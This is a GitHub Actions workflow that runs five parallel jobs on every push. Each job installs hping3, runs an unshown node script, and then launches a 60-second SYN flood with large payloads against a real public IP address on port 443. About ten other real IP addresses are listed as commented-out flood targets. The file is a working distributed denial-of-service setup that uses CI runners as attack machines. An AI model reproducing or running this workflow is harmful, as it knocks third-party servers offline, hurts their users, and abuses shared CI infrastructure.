name: 并发

on:
  push:
  workflow_dispatch:

concurrency:
  group: ${{ github.workflow }}-${{ github.ref }}
  cancel-in-progress: true

env:
  TZ: Asia/Shanghai

jobs:
  concurrent-jobs:
    runs-on: ubuntu-latest
    strategy:
      # max-parallel: 5
      fail-fast: false
      matrix:
        # job_id: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30]
        # job_id: [1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20]
        job_id: [1,2,3,4,5]
    steps:
      - uses: actions/checkout@v4
      - name: Step 1
        run: |
          sudo apt install hping3 -q
          yarn
          timeout 180s node index.js --count 36

      - name: Step 2
        run: |
          date "+%Y-%m-%d %H:%M:%S"
          # sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 47.76.85.88 || true
          # sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 47.243.69.11 || true
          # sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 47.83.0.155 || true
          # sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 47.242.104.184 || true

          # sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 139.224.71.209 || true
          # sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 106.14.219.131 || true
          # sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 8.153.68.92 || true
          sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 180.163.145.48 || true

          # fz
          # sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 125.77.20.72 || true

          # sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 8.130.111.153 || true
          # sudo timeout 60s hping3 -S --flood -V -d 65400 -p 443 -s 1000-65535 103.36.165.15 || true
